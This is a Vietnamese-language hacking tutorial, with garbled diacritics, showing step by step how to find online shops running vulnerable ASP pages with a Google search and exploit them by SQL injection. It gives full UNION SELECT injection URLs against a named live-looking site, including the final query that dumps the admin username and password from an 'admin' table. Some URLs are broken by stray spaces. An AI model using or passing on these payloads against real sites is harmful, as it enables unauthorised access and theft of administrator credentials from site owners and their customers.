Thực ra thì cái lỗi này cĩ từ lâu rồi , nhưng các bạn biết tại sao mà nĩ cịn nhiều khơng , rất nhiều , rất nhiều . Bỡi vì
đơn giản là " nhác " . Jet database cĩ nhiều cách , nhưng làm theo cách này newbie dễ hiễu và cũng khơng cần làm gì ngồi việc thêm dịng lệnh sau url bị lỗi cả .Bắt đầu
1. Vào google search từ khố :proddetail.asp?prod=* < * ỡđây các bạn cĩ thễ thay thế = bất cứ số nào 1, 2,3 ... hay 100 , 200 , tuỳ >
2. Thêm dấu ' đễ tìm site cĩ lỗi 3. Nhận biết site cĩ lỗi = dịng sau CODE
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match. /Retail/vsadmin/inc/incproddetail.asp, line 33
4. Vắ dụ cụ thễ , tơi check thữ sitehttp://www.kleer-fax.com/proddetail.asp?prod=23305
Thêm dấu ' vào sau 23305 ok ?? Lỗi hiện ra
CODE
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query _expression 'pId='23305'''. /proddetail.asp, line 246
Bắt đầu khai thác nhé các bạn , tìm table và collumn của nĩ = lệnh truy vấn sau : QUOTE
%27union%20select%201%20from%20admin
Sau khi thêm câu lệnh vào link ta được :http://www.kleer-fax.com/proddetail.asp?prod=23305%27union%20select% 201%20from%20admin
Ta được QUOTE
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/proddetail.asp, line 246
Á , sai rùi , đùa đấy , lỗi vừa rồi nĩi rằng : cĩ tồn tại giá trị collumn chứa thơng tin admin á , check tiếp Thêm ,2 vào sau select%201 .
CODE
http://www.kleer-fax.com/proddetail.asp?prod=23305%27%20union%20select% 201,2%20from%20admin A nĩ cũng báo y như trên
CODE
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
Khi vẫn chưa tìm ra được cái minh cần thì các bạn cứ thêm lần lượt ,3,4,5,6,7,8 vào tiếp cho đến khi : QUOTE
Home : All Products 4-5-6
Item: 3 List Price: $9.00 USD 7
201
Hehe đây chắnh là cái ta cần tìm . Và dãy số ta cần thêm vào ỡ trên kết thúc đến số 14 < May mà mới đến số 14 , ko nãn >
Chú ý sớ 7 và 201 nhé, đó là thơng tin của 2 columb chứa thơng tin Admin ( user/ pass) Ta thay câu lênh truy vậ ́n user và pass admin vào vi trị ́ 201 và 7
Mệt quá , :( đến tận số 201 , ai muốn học tập thì đánh đến số 201 nha :D
Đễ tiện các bạn test mình giả sữ số 201 là số 1 thì câu truy vấn sẽ là CODE
http://www.kleer-fax.com/proddetail.asp?prod=23305%27and%201=0%20union% 20select%201%2c2%2c% 27username:%20%27%2badminuser%2c4%2c5%2c6%2c%27password:%20%27%2badminpassword%2c8%2c9% 2c10%2c11%2c12%2c13%2c14%20from%20admin
Đĩ , các bạn đánh đến số 200 rùi đến 201 thì thay = adminpassword :D . Lúc đĩ sẽ hiện ra những dịng sau QUOTE
Please choose from the list below. Change username / password: Edit admin settings:
Edit categories: Edit products: Logout: